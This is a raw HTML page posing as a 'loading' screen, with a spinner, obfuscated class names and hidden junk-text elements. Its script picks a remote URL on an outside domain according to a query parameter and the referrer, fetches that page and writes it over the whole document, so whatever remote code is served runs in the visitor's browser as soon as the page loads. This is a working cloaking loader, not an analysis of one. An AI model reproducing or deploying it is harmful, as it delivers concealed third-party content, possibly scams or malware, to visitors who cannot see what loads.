<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .X2SaRvIvlT7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .X2SaRvIvlT7 .QskmMg8Z {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .X2SaRvIvlT7 .content {
            line-height: 50px;
            text-align: center
        }

        .X2SaRvIvlT7 .img {
            width: 100%
        }

        .X2SaRvIvlT7 .e9a5B51p {
            text-align: center
        }

        .X2SaRvIvlT7 .e9a5B51p span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .X2SaRvIvlT7 .e9a5B51p span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .X2SaRvIvlT7 .e9a5B51p span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .X2SaRvIvlT7 .e9a5B51p span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .X2SaRvIvlT7 .e9a5B51p span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .X2SaRvIvlT7 .e9a5B51p span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .X2SaRvIvlT7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wvb2iFAS2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wyBGG = wvb2iFAS2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wyBGG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wyBGG +".html?a=share";
		}
		
        rxMxa6gfK=url+"#"+new Date().getTime();
        rxMxa6gfK && function() {
            $.get(rxMxa6gfK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >HEM0bpFFfVLiIKYp3c3eMyP5AzrWY8CZl3rvTUelmnvJ4v8UTW9XrkSUUxzfbpaJTvtbVftXGTHkIZf</h1>
<p  style='display:none'>jCmLVPgbkGqshcU9hQuSUTf</p>
<div style='display:none'>kbgynZn9KttizHEX</div>
<div style='display:none'>kbgynZn9KttizHEX</div>
<div style='display:none'>kbgynZn9KttizHEX</div><div class="X2SaRvIvlT7">
    <div class="QskmMg8Z">
        <div class="e9a5B51p">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >KxQb8uUlqOjo20VhMRIwEGIP5HOaFtebGIWGww8cjx8j5vTb1w9qbyBvxu6sUo4aW</li>
<a  href='#' style='display:none'>H9qtUjeJnILJLrfuLT8U</a>
<a  href='#' style='display:none'>H9qtUjeJnILJLrfuLT8U</a>
<span style='display:none'>A1Ya0yrbvV1PkvcDlDIB6LGxReCi7dioXRWkDkFP40yAO6i9nbNp</span>
<img  src='' style='display:none'>
<span style='display:none'>A1Ya0yrbvV1PkvcDlDIB6LGxReCi7dioXRWkDkFP40yAO6i9nbNp</span>
<a  href='#' style='display:none'>H9qtUjeJnILJLrfuLT8U</a></body>
</html>